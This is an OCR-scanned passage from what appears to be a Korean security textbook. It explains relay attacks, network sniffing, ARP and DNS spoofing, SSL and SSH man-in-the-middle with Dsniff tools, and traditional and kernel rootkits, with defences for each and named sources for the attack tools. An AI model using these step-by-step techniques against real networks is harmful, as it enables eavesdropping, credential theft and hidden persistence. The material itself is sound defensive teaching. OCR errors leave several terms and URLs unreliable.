다면 우편봉사기기능은 비활성으로 선택하는 식으로 체계설정을 해놓을수 있다. 만일 X 
Windows 체 계 가 필요 없다면 그 프로그람을 정지시키 면 된다. 기 타 쓰지 않는 모든 봉사 
체 계 들을 정지시켜 해 당한 포구들을 닫아야 한다. 안전한 체계설정문건을 작성하여 기관 
의 모든 체 계담당자들이 단계 별 로 쓸수 있는 봉사기 안전구축조치 를 취 해 야 할것 이 다. 

보충적으로 말하여 IDS 의 기능을 항상 갱 신하도록 하는것 이 중요하다. 대부분의 IDS 
판매업체들은 대체로 한달에 한번씩은 갱신된 새로운 형태의 공격표적들을 배포한다. 이 
공격표적 의 구입 이 가능하면 신속히 성 능검 사하고 IDS 에 추가설 치하여 최 신공격 수법 을 
검출할수 있도록 해야 한다. 

중계공격 

분산형공격 수법의 마지 막형 태 는 인터네 트상에서 를퓨터별로 정 보를 계 속 중계 시 킴 으 
로써 공격 자의 실지원천콤퓨터 를 추적할수 없게 보호하도록 하는 수법 이 다. 흔히 예 상할 
수 있듯이 대부분의 공격자들은 잡히기를 원하지 않는다. 공격자는 자기와 타격대상사이 
에 련계 를 모호하게 하는 기 만적 인 우회층을 많이 쌓아 놓음으로써 추적 되 지 않으려고 
한다. 공격 자가 인터네 트에 접속되 여 있는 여섯대 의 콤퓨터 를 장악하여 타격 대 상에 대 한 
공격 을 하려 한다고 보자. 공격 자는 여섯대의 콤퓨터 에 파케 트방향바꾸기프로그람을 각 
각 설치한다. 첫 콤퓨터 가 해 당 포구로 받은 임의의 파케 트를 두번째 콤퓨터 에 보낸다. 
두번째 콤퓨터 는 그것 을 세번째 에 보내 는 식 으로 계 속되 여 마지 막에 는 목표에 이 론다. 
매 체계는 공격자의 송신에 복무하는 하나의 중계망에 있는 고리로 된다. 만일의 경우 
공격 을 탐지하면 수사림 은 매 중계점 들을 거 꾸로 밟아 추적하여 공격 자를 찾아 낼 것 이 다. 

공격자들은 대체로 세계적으로 널려 있는 수많은 콤퓨터들을 장악하여 중계망을 구 
성한다. 또한 수사관들의 추적을 피 하기 위해 중계망의 매 점들이 지 리적 으로나 정 치적으 
로나 차이가 크고 쓰는 언어가 완전히 다른 지역에 놓이도록 한다. 실례로 첫 중계는 미 
국에 서，둘째 중계 는 중국에 서，셋 째 중계 는 인디 아에 서，넷째 중계 는 파키 스탄에 서 그리 
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고 마지막공격은 이라크에서 하여 결국 미국에 있는 대상들을 공격하게 할수 있다. 매 
중계 점 들에서 수사관들은 서 로 다른 언어 로 말하는 사람들，나라마다 친절 치 못한 태 도， 
사법관계의 큰 차이로 하여 큰 싸움을 치르지 않으면 안되게 된다. 

중계공격실행에 흔히 쓰이는 매우 유연한 도구는 Netcat 토서 UNIX 용은 현재 
http :// www .10 pht . com / users /10 pht / ncll 0 .tgz 에 서 구입 할수 있 으며 Windows NT 용은 http :// 
www .10 pht . com /~ weld / netcat / 에서 구입 할수 있 다. 다른 하나의 인기 있는 중계 도구는 Redir 
로서 http :/ 八) h . verio . com / 〜 sammy/hacks 에 서 구입 할수 있 다. 

중계공격에 대처한 방안들 중계공격 의 대 부분은 기 관내망밖에 서 진행 되 는것 이 므로 이 
공격 에 대처할 방도는 거의 없다. 공격 이 미 치기전에 파케트들을 서로 주고받고 하는 콤 
퓨터들의 행동을 미리 막을수는 없는것이다. 최선의 방도는 모든 안전조치들을 보강하고 
필요 없는 봉사는 다 닫아 버려 체계의 안전성을 기하는것이다. 보충적으로 사법관계일 
군들과 협력하여 이러한 공격을 조사하는것도 중요하다. 


적극적엿보기 


엿보기는 력사가 더 오랜 또 하나의 수법으로서 현재 새로운 능력으로 빨리 확장되 
고 있 다. 전통적 인 엿 보기 도구들은 망상에 서 전송정 보를 수집하는 단순한 프로그람이다. 
사용자가 엿보기프로그람을 어느 한 콤퓨터 에 설치하면 그 콤퓨터 는 자기 에게 오는것 이 
든 다른 곳에 가는것이든 관계없이 자기 콤퓨터의 망대면부를 지나가는것이라면 모든 자 
료를 다 잡는다. 망관리자가 이 도구를 쓰는 경우 전송통로를 헛갈린 파케트들을 잡아 
망의 고장을 퇴 치할수 있 다. 공격 자가 쓰는 경 우 망에 서 전송되 는 통과암호，파일 들，전 
자우편 등과 갈은 기밀성이 있는 자료들을 손에 넣을수 있게 된다. 

전통령엿보기 

전통형엿 보기도구들은 피동적 인것 이 여서 자기 망에서 전송자료가 지 나가기 를 참을성 
있게 기다리다가 어떤 자료가 도착하면 잡는 방식이다. 이 피동적수법은 일부 망형태들 
에서 는 효과가 좋다. 방대한 수의 국부망 ( LAN ) 형성 에 리용되는 보편적 인 기술인 전통형 
이씨네 트는 동시 전송수단이 다. 이씨 네 트집 선기들은 전통형 이써네 트 LAN 을 구축하는데 
쓰이는 장치이다. 이 LAN 상의 어느 한 를퓨터에 보내는 모든 자료는 LAN 에 련결되여 
있 는 모든 콤퓨터 들에 동시 전송된 다. 따라서 전통형엿 보기 도구만 있 으면 동일 한 LAN 상 
에 서 서 로 다른 를퓨터 들사이 에 오가는 그 어 떤 자료든지 훔쳐 볼수 있 다. 전통형엿 보기 
공격을 하기 위해서는 공격자가 그 LAN 상의 어느 한 콤퓨터를 장악하고 거기에 도청프 
로그람을 설 치하면 그 망에 소속된 모든 콤퓨터 들에 가는 전송자료들을 다 손에 넣 을수 
있 다. 가장 좋은 전통형엿 보기 도구들로서는 Snort ( http :// www . snort.org 에 서 구입 가능함)와 
Smffit ( http :// reptile . rag . ac . be / 〜 coder / sniffit.html 에 서 구입 가능함)가 있 다. 

전통형엿보기에 대처한 가장 보편적인 방어대책으로는 교환기를 LAN 에 설치하는것 
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이 다. 동시 방송수단인 이씨 네 트집선기 와는 달리 이씨 네트교환기는 목적 한 대상에만 자료 
를 보낸다. 이 이써네트교환기가 해당 대상콤퓨터에만 자료를 보내기때문에 그 망의 다 
른 콤퓨터에서는 그 자료를 볼수 없다. 다른 하나의 방어기법으로서는 자료를 암호화하 
는것 이 다. 공격자에게 암호해독열쇠가 없으면 아무리 망에서 자료를 엿보거나 훔쳤다 해 
도 그 내용을 알수 없게 된다. 가장 많이 쓰이는 두가지 암호규약들로는 Web 자료통신용 
안전소케트층 (SSL) 과 명령렬쉴방식의 체계접근보호용안전쉴 (SSH) 이다. 

적극적엿보기에 대처한 방도 

방어대책들은 설치하기 쉽고 효과가 있으나 그에 대항하여 공격자들은 여러가지 수 
법 들을 개 발해 내 였 다. 적 극적엿 보기 라고 통칭 되 는 이 기 법 들은 망에 전송자료들을 주입 
하여 다른 방법으로는 훔치기 힘든 자료들을 공격자들이 얻을수 있는 방법이다. 그중 가 
장 능력이 높고 활동적인 프로그람이 Dsniff 인데 현재 http://www.monkey.Org/~ 
dugsong/dsniff/ 에 서 구입 이 가능하다. 망에 전송자료를 주입 함으로써 엿 보기 를 하는 
Dsniff 의 방식들에는 MAC 주소범 람，허위 ARP 자료전송，위조 DNS 응답 그리고 SSL 에 대 한 
중개인공격 등이 있다. 

배체접근조종 ( MAC ) 주소범람 이 이씨네 트교환기는 매 체접근조종주소에 기초하여 LAN 
에서 어디로 자료전송을 할것인가를 결정한다. MAC 주소는 고유한 48bit 수자로서 매 이 
써네 트카드에 배 당되 여 있 다. MAC 주소란 LAN 을 구성하는 매 콤퓨터 의 망접 속하드웨 어 
주소를 말한다. 이써네 트교환기 는 어 느 단자들이 어 느 MAC 주소와 련결되 여 있는가를 알 
기 위하여 교환기 의 LAN 의 자료흐름상태 를 항상 감시한다. 실례 로 교환기 는 MAC 주소 
AA:BB : CC : DD : EE:FF 로부터 오는 전송자료가 1 번단자에 온다는것을 알수 있다. 교환기는 
이 정 보를 기 억 하고 이 MAC 주소로 오는 모든 자료들을 오직 이 첫 단자에만 련결시 켜 
준다. 이 런 식 으로 LAN 의 다른 콤퓨터 들의 망대 면부와 관련 한 MAC 주소들을 자동적으 
로 람지 하고 해 당 자료들을 해 당 콤퓨터 에만 보낸 다. 

가장 간단한 적 극적엿 보기기 법의 하나는 LAN 에 가짜 MAC 주소를 가진 자료들을 다 
량 주입하는것이다. 공격자는 LAN 이 어느 한 콤퓨터에 설치된 어떤 프로그람을 리용하 
여 임의 로 만들어 낸 MAC 주소들을 가진 파케 트들을 생성하여 교환기 에 주입한다. 교환 
기는 들어 오는 모든 자료들의 MAC 주소들을 다 기억하려고 한다. 결국 교환기의 기억이 
그 가짜주소들을 기억하는데 다 소모되여 버릴것이다. 기억이 다 차면 일부 교환기들은 
할수 없이 전송자료들을 LAN 의 모든 틈퓨터들에 다 보내는 방식으로 들어 가게 된다. 
그렇 기 때 문에 공격 자들은 MAC 주소를 다량 주입하여 교환기 를《 폭격》함으로써 교환기 
가 모든 전송자료들을 LAN 의 모든 콤퓨터들에 보내지 않으면 안되게 만든다. 그다음에 
는 전통적 인 엿 보기 도구들을 리용하여 LAN 에 서 자료를 손에 넣 을수 있 게 한다. 

위조 ARP 자료전송 우에 서 본것 처 럼 일 부 교환기 들은 MAC 범 람에 의하여 모든 콤퓨터 
들에 자료전송을 다 해줄수도 있지만 그렇게 하지 않는 교환기들도 있다. MAC 주소가 범 
람할 때이러한 교환기들은 LAN 에서 이미 알아 두었던 초기 MAC 주소들을 기억하여 주 
소가 범 람되 는 전 기 간 이 주소들을 리용한다. 공격 자가 MAC 주소를 범 람시켜 도 교환기 
는 끄떡 없다. 그러나 공격자는 주소변환규약 (ARP) 에 기초한 다른 새로운 형의 자료흐름 


42 



을 주입함으로써 LAN 에 재공격 을 시 도할수 있 다. 

ARP 는 인 터 네 트규약 ( IP ) 주소로 LAN 상의 MAC 주소를 찾기 위 한 주소목록작성 에 리 
용된다. LAN 상에서 한 기계가 다른 기계에로 자료를 전송할 필요가 있다고 하면 그 기 
계는 수신할 기계의 IP 주소로 파케트를 만든다. 그러나 그 IP 주소는 다만 그 대상기계에 
대한 체계설정에 지나지 않는다. 그러면 파케트를 보내야 할 기계는 LAN 상의 어느 하드 
웨어에 그 파케트를 보내야 하는가. ARP 가 바로 대답이 다. LAN 상에 있는 한 콤퓨터가 
IP 주소 10.1.2.3 에 보낼 파케트를 가지고 있다고 하자. 그 콤퓨터는 LAN 상에 ARP 요구신 
호를 보내여 어느 망대면부가 IP 주소 10.1.2.3 과 련결되여 있는가를 물어 본다. 이 IP 주소 
를 가진 기계는 ARP 응답신호로 《 IP 주소 10.1.2.3 은 MAC 주소 AA : BB : CC : DD : EE : FF 와 련 
결되여 있음》이라는 요지의 내용을 내보낸다. 이 신호를 받은 기계는 앞으로의 참고를 
위해 이 IP 주소와 MAC 주소의 련관내 용을 ARP 대 응표라고 부르는 표를 자기 기 계 안에 보 
관해 놓는다. 그다음 이 MAC 주소를 가진 망대면부에 이 파케트들을 보낸다. 이렇게 
ARP 는 IP 주소를 MAC 주소로 변환하여 LAN 상에서 해당 자료들을 해당 기계에 보내주는 
데 쓰인다. 결과값들은 LAN 상에서 다시 ARP 률 전송하지 않도륵 자기 를퓨터에 ARP 대 
응표로 보관해 놓는다. 

ARP 는《무료 ARP 》 라고 하는 기능도 지원한다. 이 무료 ARP 로는 어느 기계가 ARP 
요구신호를 보내오지 않아도 ARP 응답신호를 보낼수 있게 된다. 많은 콤퓨터 들은 LAN 상 
에서 성능을 향상시키는데 도움이 되는 이 ARP 자료들을 자기의 ARP 표에 포함시 키 려 고 
한다. 

다른 하나의 적 극적엿 보기형 태 에서 는 공격 자가 그림 3_2에 서 보는것과 같이 허위 적 
인 무료 ARP 통보문을 리용하여 자료전송방향을 바꾸어 교환기 가 달린 LAN 상에 서 엿 보기 
를 진행한다. 그림 에 서 LAN 상에 있는 공격 자의 콤퓨터 는 검 은 모자를 씌 워 놓은것 이 다. 



그림 3-2. 무료 ARP 통보문을 사용하여 교환기 
환경 에 서 적 극적엿 보기 를 실 행 하기 


그림 3—2에 서 보는 공격단계 는 다음과 같다. 
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1. 공격자는 공격자콤퓨터에서 IP 전달을 한다. 교환기에서 공격자의 콤퓨터에로 향 
해 진 파케트들이 LAN 경로기에 다시 향해 진다. 

2. 공격 자는 무료 ARP 통보문을 공격 대상으로 지적한 콤퓨터 에 보낸다. 바로 이 콤퓨 
터에서 외부로 나가는 통신내용을 공격자가 노리는것이다. 보내여 진 ARP 통보문 
은 LAN 경 로기 의 IP 주소를 공격 자자신의 MAC 주소로 변환시켜 준다. 대 상콤퓨터 
는 이 허위적인 ARP 신호를 받아서 자기 ARP 표에 기록한다. 대상콤퓨터의 ARP 
표는 이젠 허위자료에 의해 《독약》을 먹은셈이다. 

3. 대상콤퓨터는 외부로 내보내게 된 전송자료를 보낸다. 콤퓨터는 자기의 ARP 표를 
참조하여 LAN 경로기의 주소를 알아 보려고 한다. 표에서 찾은 MAC 주소는 공격 
자의 주소로 되 여 있다. 밖으로 내보내는 모든 자료는 공격 자의 콤퓨터로 간다. 

4. 공격 자는 회선으로부터 전송자료를 훔쳐 본다. 

5. 첫 단계에서의 IP 전송을 다시 하여 공격자의 콤퓨터에서 나오는 모든 자료전송을 

LAN 의 기정경 로기 에 가게 방향을 바꾸어 준다. 이 경 로기는 자료를 외부에 보 
낸다. 이렇게 되여 피해자콤퓨터는 자료를 외부에 보낼수 있게 되나 외부로 가는 
도중에 이 렇게 공격 자의 콤퓨터 에 의해 중도에서 훔쳐 지게 된다. 

이런 과정을 거처 공격자콤퓨터는 해당 콤퓨터에서 외부로 전송되는 자료를 몽땅 엿 
볼수 있 게 된 다. 그런 데 공격 자가 교환기 에 는 그 어 떤 교정조작을 전혀 하지 않는다는 
사실에 주목할 필요가 있다. 공격자는 대상콤퓨터의 ARP 표만 조작하여 LAN 교환기망에 
서 자료를 엿보는것 이 다. ARP 자료전송과 해 당 MAC 주소정 보전송이 LAN 을 통해 서 만 진 
행되 기 때 문에 해 당 LAN 에 있는 콤퓨터 를 공격 대 상으로 삼는 경 우에 만 이 엿 보기 수법 이 
가능할수 있다. 

위조 DNS 응답신호 파케 트들을 망에 주입하여 LAN 바깥까지 의 전송자료들을 훔쳐 보 
는 이 수법 에는 령 역이름체계 (DNS) 를 조작하는것을 기본방법으로 삼고 있다. ARP 가 
LAN 상에 서 IP 주소를 LAN 상의 MAC 주소로 련결시 키 는데 쓰는것 이 라면 DNS 는 일 반망상 
에서 령 역이름을 IP 주소로 련결시켜 주는데 쓰이는것 이 다. 사용자가 의뢰 자쏘프트웨 어 
례 하면 Web 열 람기 에 www.skoudisstuff.com 이 라고 입 력 하면 사용자의 체 계는 DNS 봉사기 
에 문의신호를 보낸 다. 이 DNS 봉사기 는 망의 저 쪽에 있는 다른 LAN 에 위 치하여 있 다. 
이 문의신호를 받자마자 DNS 봉사기 는 자기 구성파일 에 있는 해 당 정 보를 찾아서 는 IP 주 
소(례하면 10. 22. 12. 41) 를 가진 사용자콤퓨터 에 DNS 응답신호를 보낸 다. DNS 봉사기 가 
사용자를 위해 령 역 이름을 IP 주소로 바꾸어 준다. 

공격자들은 가짜 DNS 응답신호를 목표로 된 를퓨터에 보냄으로써 자료통신의 방향을 
바꾸어 놓는다. 무료 DNS 응답신호 갈은것은 없지만 이 수법 에서 목표콤퓨터 와 DNS 봉사기 
사이 에 있는 망우의 그 어 떤 지점 에 앉아 있는 공격 자는 회 선에서 DNS 문의신호를 엿볼 
수 있게 된 다. 목표콤퓨터 에 서 오는 DNS 문의신호를 보자마자 공격 자는 그 목표를퓨터 에 
자기콤퓨터의 IP 주소를 담은 가짜 DNS 응답신호를 보낸다. 속히운 목표콤퓨터는 자기가 
지 금 해 당 봉사기 와 통신을 주고 받는것 으로 생 각하고 자기파케 트들을 이 IP 주소로 보내 
게 된 다. 결 국 정 보는 공격 자의 콤퓨터 로 도착한다. 공격 자는 전통적엿 보기 도구로 자료를 
본 다음 목적 지 인 해 당 봉사기 에 그 자료를 중계해 준다. 
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SSL 에 대한 중개인공격 가짜 DNS 응답을 망에 주입하는것 은 특히 안전한 Web 접 근에 
쓰이 는 SSL (안전소케 트층)과 같은 암호화규약에 대 한 중개 인공격 시 에 강력한 수법 으로 
된다. 본질상 공격자가 가짜 DNS 응답신호를 목표에 보내여 새로운 SSL 과정이 공격자의 
기계를 통하여 설립되도록 하는 수법이다. 그림 3 — 3에서 보는바와 같이 공격자는 전문 
적 인 중계 도구를 리용하여 두가지 암호화과정 을 거 친다. 즉 의뢰기(목표물)와 공격 자사이 
그리고 공격자와 봉사기사이의 두 대화조종과정 이 다. 두 과정사이에 자료가 오가는 과정 
에 공격 자는 그것을 명백한 본문형 태 로 보게 된다. 



그림 3-3. DNS 응답신호를 주입하여 SSL 전송내 용을 
방향 바꾸어 훔치는 수법 

그림 3 — 3에서 제시된 대화조종과정들은 다음과 같다. 

1. 공격자는 가짜 DNS 응답신호를 보내는 Dsniff 의 dnsspoof 프로그람을 기동시킨다. 
보충적으로 공격 자는 Web Monkey - in-the Middle 의 략어 인 webmitm 이 라는 Dsniff 
의 다른 또 하나의 프로그람을 기동시킨다. 이 도구는 전문적으로 SSL 중계만 실 
행 한다. 

2. 공격자는 피해자를퓨터에서 DNS 질문신호가 오는가를 감시하다가 신호가 오면 가 
짜 DNS 응답신호를 보낸다. 이 가짜 DNS 응답신호에는 공격자를퓨터의 IP 주소가 들 
어 있다. 

3. 피해자를퓨터는 이 DNS 응답신호를 받고 그 응답신호에 담겨 진 IP 주소로 SSL 대 
화조종을 개 시 한다. 

4. 공격 자의 콤퓨터에서 동작하고 있는 webmitm 도구는 피해 자콤퓨터와는 SSL 대화 
조종을 실현하며 의뢰기와 실지 Web 봉사기와의 다른 하나의 SSL 대화조종도 실 
현 한다. 

5. 피해자는 SSL 회선으로 자료를 보낸다. 피해자로부터의 SSL 회선을 통해 오는 전 
송자료를 webmitm 도구가 복호화했다가 다시 그 자료를 암호화하여 Web 봉사기에 
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넘 긴다. 중간에서 가로채 본것도 모르고 이 외부 Web 봉사기 는 전송자료를 받는다. 

이 수법의 효력이 상당한것만은 틀림 없지만 공격자의 견지에서 볼 때는 한가지 
제한성이 있다. 피해자와 공격자사이에 SSL 련계를 지을 때 공격자는 자기의 SSL 수자 
식 인증서 를 보내 지 않으면 안되 게 된 다. 피 해 자가 보낸 모든 자료를 복호화하기 위해 
서도 실지 자료전송목표인 Web 봉사기의 인증서가 아니라 자기 수자식인증서를 사용 
해야 한다. 피해자의 Web 열람기가 공격자가 보낸 가짜인증서를 받으면 이 Web 열람기 
는 사용자에 게 경 고문을 현시할것 이 다. 이 열 람기 는 봉사기 에 서 받은 인증서 가 열 람 
기 가 신임하지 않는 인증기 관의 서명 을 받은것 이 라는 내 용을 통보할수 있다. 그다음 
열 람기 는 련결을 짓 겠는가에 대 한 사항을 《 OK 》 혹은 《C 이 inect 》 라는 단추를 제 시 
하면서 사용자에 게 묻는다. 대 부분의 사용자들은 열 람기 의 이 경 고문을 리해하지 못 
하고 성급히 련계를 짓는다. 열람기는 사용자가 그 가짜인증서를 접수하라고 하였으 
므로 안전한 결선을 한다. 결선이 된후 공격자는 SSL 대화과정의 모든 자료를 손에 쥐 
게 될 것 이 다. 본질 상 공격 자가 SSL 인증서 에 대 한 신임결정 을 사용자의 손에 맡기 는셈 
이 다. 

명령쉘로 원격접속하는데 쓰이는 안전쉴 (SSH) 에 대한 공격에도 우와 꼭 같은 기법이 
리용된다. Dsniff 에는 SSH 중간공격에 리용되는 sshmitm 이라는 도구도 있다. SSL 공격에서 
와 마찬가지 로 Dsniff 는 두가지 SSH 접 속을 실현한다. 하나는 피 해 자와 공격 자사이 이고 
다른 하나는 공격 자와 목적지봉사기 이 다. 여 기서도 Web 열 람기는 조작된 SSL 인증서 에 대 
해 경 고문을 내 보내 는데 SSH 의뢰기 는 SSH 봉사기 가 쓰는 공개열쇠 를 왜 이 열 람기 가 인 
정 안하는지 모르겠다고 두덜거 린 다음 경 고를 무시 하고 련결시키 면 SSH 대 화교환이 시 작 
되며 이때에는 벌써 공격자가 모든 통신내용을 다 보고 있을 때이다. 

적극적엿보기수법들에 대처한 방안들 공격 자가 엿 보기 도구로 망우에 서 오가는 유용한 
정보를 몽땅 훔쳐 보는 조건에서 이러한 공격에 어떤 방도로 대처할것인가. 첫째로 망으 
로 교환되는 자료는 가능한껏 암호화해야 한다. Web 통신에는 SSL, 암호화된 접속개시와 
파일전송에 는 SSH, 암호화된 전자우편에 는 S/MIME, 망층암호화에 는 IPSec 등 안전한 규 
약을 씨야 한다. 사용자들은 기술적으로나 정신적으로나 각성하여 이러한 도구를 활용함 
으로써 기밀자료를 잘 보호해 야 한다. 

특별히 중요한것은 체계운영자들, 망관리자들, 보안담당자들이 이러한 안전규약을 리 
해 하고 응용하여 자기 사업 을 잘 수행하는것 이 다. 방화벽，경 로기，기 밀 적 인 봉사기 나 공 
개열쇠 기반체 계 에 는 절대 로 텔네 트로 접 속하지 말아야 한다. 텔네 트가 이 경 우 평문으로 
송신하기 때 문에 공격 자가 중간에 서 통과암호를 가로채 기 가 너 무나도 쉽다. 또한 열 람기 
와 SSH 의뢰기 가 내 보내는 경 고문들에 특별히 관심 을 돌려야 한다. 불확정한 인증서 로 
SSL 대 화를 개시하여 망으로 기밀정 보를 보내 는 현상이 없도록 하여 야 한다. 만일 SSH 의 
퇴기가 봉사기의 공개열쇠가 이상하게도 변경되였다고 경고문을 내보내면 수사해 볼 필 
요가 있다. 

또한 집선기가 도중에서 정보가로채기에 걸릴수 있는 우려가 많으므로 집선기들을 
없 애 는것 도 고려해 볼 필요가 있 다. 집 선기보다 가격 이 비 싸지 만 교환기 는 보안신뢰 도도 
향상시키 고 성 능도 향상시 킨다. 망에 교환기 를 전반적 으로 설 치하는것 이 불가능하다면 
최 소한 주요망경 간에 만이 라도 교환대 가 설 치 된 이 써 네 트인 《 비 무장지 대》 (DMZ) 를 구축 
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하는것도 방도의 하나라고 할수 있을것 이 다. 

마지막으로 기밀체계와 기밀자료를 다루는 망들에는 교환기에 포구준위의 보안 
대책이라도 세워 놓아야 한다. 즉 매 교환기포구와 그 포구를 쓰는 기계의 고유 
MAC 주소를 설정하여 MAC 주소범 람문제 나 가짜 ARP 통보문을 막아 낼수 있을것 이 다. 
더 나아가서 인터네트 DMZ 와 같은 기 밀성 이 높은 망들에서는 매 말단기 계 에서 
LAN 상의 모든 를퓨터체계의 MAC 주소들을 하드웨어적으로 코드화한 정적인 ARP 표 
를 사용해 야 한다. 교환기상의 포구안전체 계 와 하드웨 어 적 으로 코드화한 ARP 표들은 
조작하기 매 우 어 렵 다. 그것 은 부품이 나 지 어 이씨 네트기판들을 교체 하자면 여 러 체 
계 에 내 장된 MAC 주소들을 갱 신해 야 하기때 문이 다. 인 터네 트 DMZ 같은 매 우 기 밀 
적인 망들의 보안을 위해서는 이러한 준위의 보안대책이 필요하며 또 반드시 실행 
되여야 한다. 


핵심부준위의 루트키트의 확산 


공격자들은 ARP 와 DNS 와 같은 매우 중요한 기본규약들을 공격대상으로 삼고 있을 
뿐아니 라 조작체 계 ( OS ) 의 심 장부도 남김 없 이 리용하고 있 다. 특히 핵 심 부준위 의 루트키 
트에 대 한 개 발이 상당한 정도로 진행 되 고 있다. 핵 심부준위의 루트키트에 대 한 리해를 
보다 깊이 하기 위하여서는 그 개발과정의 조상이라고 할수 있는 전통적 인 루트키트를 
우선 분석해 보는것 이 필 요하다. 

전통적인 루트키트 

전통적인 루트키트는 공격자로 하여금 어떤 체계에 운용관리자 ( superuser ) 준위의 접근 
을 유지 하게 하는 도구들의 묶음이다. 일단 공격자가 뿌리준위 에서 어느 한 콤퓨터 에 대 
한 조종을 실현하면 루트키트는 그 를퓨터에 대한 접근을 지속하게 한다. 전통적 인 루트 
키 트에는 대체 로 공격 자가 정상보안조종체 계를 우회하여 그 콤퓨터 에 대 한 접근을 할수 
있 게 하는《 뒤문치기》라는 도구도 있 다. 루트키 트에 는 또한 공격 자가 그 콤퓨터 에 은 
거할수 있게 하는 각이한 프로그람도 있다. 기능이 가장 완비된 일부 루트키트로는 쏠라 
리 스와 Linux 에 서 실행 가능한 Linux 루트키트 5( lrk 5) 와 TOrnkit 가 있다. 다른것들과 마찬가 
지 로 이 두가지 루트키 트들은 http :// packetstom . security . com / UNK / penettation/rootkits 주소에 
서 구입할수 있 다. 

전통적 인 루트키 트들은 조작체 계 에 있는 주요실 행프로그람들을 바꿔 치 는 방법 으로 
뒤문치기수법과 은거수법을 실현한다 . 실례로 대부분의 전통적 인 루트키트프로그람들에 
는 / bin/login 프로그람을 바꿔 넣을수 있는 대체본이 있다. 이 / bin/login 프로그람들은 사용 
자들이 UNIX 체 계 에 접속할 때 인증용으로 쓰는 프로그람이다. 루트키트에 있는 
/ bin/login 대 체 본은 공격 자가 알고 있 는 통과암호를 가지 고 있 어 이 것 으로 콤퓨터 에 대 한 
뿌리준위의 접근을 할수 있다. 공격자는 공격대상인 콤퓨터에 있는 이전판 / bin/login 에 
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루트키 트의 대 체 본을 덧 쓰기 하고는 시 간기 록과 파일 크기 를 이 전의 것 과 일 치 하게 조작 
한다. 

/ bin / login 프로그람을 바꾸어 넣 어 뒤문치기 수법 을 리용하는것 처 럼 대 부분의 루트키 트 
에 는 체 계관리 자들이 체 계분석 에 쓰는 기 타 UNIX 용도구대용 트로이 목마대 체프로그람들 
도 있 다. 많은 전통루트키 트들은 Is 명 령 문(흔히 폴더내 용을 보여 줌)대 신 트로이 목마대 체 
본들을 쓴다. 변경된 Is 명령문은 공격자의 도구들을 감추어 주어 절대로 현시되지 않게 
한다. 또한 공격자들은 사용중인 TCP 와 UDP 포구들을 보여 주는 도구인 netstat 프로그람 
을 자기 의 대 체본으로 바꾸어 공격 자가 사용하는 포구들에 대 해 거 짓 말을 하게 한다. 이 
와 류사한 방법 으로 ifconfig , du , ps 같은 기 타 많은 체 계프로그람들도 바꾸어 치 울수 있 
다. 이 모든 프로그람를은 체계관리자에게 있어서 눈과 귀의 역할을 하는것들이다. 공격 
자는 전통적인 루트키트를 사용하여 이 눈과 귀를 다 바꾸어 놓음으로써 체계에 공격자 
의 프로그람들이 존재하고 있음을 모르게 한다. 

전통적 인 루트키 트들을 탐지 하기 위해서 많은 체 계관리 자들은《 존경 받을만한》프 
로그람인 Tripware ( http :// www . 仕 ipware . com 에 서 구입 가능함)와 같은 파일 체 계 무결성검 사도 
구들을 리 용한다. 이 도구들은 사활적 인 역 할을 하는 체 계 파일 (례하면 / biMogin,ls netstat , 
ifconfig , du , ps 등)에 있는 암호학적 으로 강력한 하쉬 들을 계 산하여 이 수자식 지문들을 
쓰기방지한 플로피 디스크와 같은 안전한 매체 에 보관한다. 그다음 정 기적 으로(매체를 매 
일 혹은 매 주마다) 무결성검 사프로그람을 기 동시 켜 그 콤퓨터 의 실 행파일들의 하쉬 를 다 
시 계 산하여 따로 보관된 값과 비 교한다. 변화가 있 으면 그 프로그람을 수정하며 따라서 
체 계관리 자는 각성 을 높이 게 된 다. 

랙심부준위루트키트 

전통적 인 루트키트들을 사용하여 사활적 인 체 계실행파일들을 바꾸어 놓는 한편 공 
격 자들은 한걸 음 더 나아가 핵 심 부준위루트키 트들을 리용하고 있 다. 핵 심 부란 디 스크， 
체 계 처 리 장치，주기억 등과 갈은 모든 자원의 접 근을 조종하는 모든 OS 의 심 장을 말한 
다. 핵 심 부준위루트키 트들은 응용프로그람준위 의 파일들을 다치 는것 이 아니 라 바로 그 
핵심들을 변경시킨다. 그림 3—4의 왼쪽에서 보는바와 같이 트립와이어 같은 파일체계 
검 사도구들은 핵 심 부에 기 초하여 응용프로그람의 무결성 을 검 사하기 때 문에 핵 심 부를 다 
치지 않는 전통적인 루트키트들은 발견해 낼수 있다. 응용프로그람이 변경되면 좋은 트 
립와이 어프로그람 갈은것 은 그 좋은 핵 심 부를 리용하여 트로이 목마대 체본프로그람들을 
발견할수 있다. 

그림 3 _4에 서 오른쪽에 있는것 이 핵 심 부준위루트키 트이다. 모든 응용프로그람들은 
그대로 있지만 핵심부는《썩어》서 공격자에게 뒤문도 열어 놓고 있으며 공격자의 체계 
침입에 대해서도 체계관리자에게 허위보고한다. 가장 강력한 일부 핵심부준위루트키트 
들로는 http :// packetstom . security . com / UNDC / penettation / rootkits 에 서 구입 할수 있는 LINUX 용 
Knark , http :/ 八 vww . inforwar . co . uk / 出 e / sllm -1.0. html 구입 할수 있 는 Plasmoid 의 Solaris 용 
핵 심 부준위 루트키 트 그리 고 http :/ 八 vww . rootkits . com 에 서 구입 할수 있는 Windows NT 용핵 심 
부준위루트키 트를 들수 있 다. 
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전통적인 루_:트가 침해한 체계 


핵심부준위 루트키트가 침해한 체계 




1 트로이목마 II 트로이[트로이목마 II 생생한 1 
| login || ps ||ifconfig||ripwire| 

I 생생한 II 생생한 II 생생한 II 생생한 ■ 

| login || ps | |ifconfig||t i ipwi ie| 

1 ^li3-T-( Kernel) 1 

1 핵심부 ( 故 me i> | 




그림 3-4. 전통적 인 루트키 트와 핵 심 부준위 루트키 트 


수많은 기능들을 가진 각이한 핵심부준위루트키트들이 현재 출현하고 있는 조건에서 
그중 가장 인기 있는 기능들은 다음과 같이 묶어 볼수 있다. 

• 실행방향바꾸기기능 이 기능으로는 그 어떤 응용프로그람을 실행시키라는 명령 
을 중간에서 가로채여 그 명령을 조작하여 공격자가 선택한 다른 응용프로그람 
을 실행 시 킨다. UNIX 의 /bin/login 루린과 관련한 씨 나리 오를 가상해 보자. 공격 자 
가 핵 심부준위루트키 트를 설치한 다음 /bin/login 파일은 고치지 않고 그대 로 둔다. 
/bin/login 이라는 모든 실행명령(누구든지 체계에 접속할 때마다 생기는 명령)은 
조작되 여 숨겨 져 있 는 파일 인 /bin/backdoorlogin 을 실 행 시 키 게 끔 설 정 된 다. 어 떤 
사용자가 접속하면 뒤문치기통과암호도 있는 /bin/backdoorlogin 이 실행되 여 뿌리 
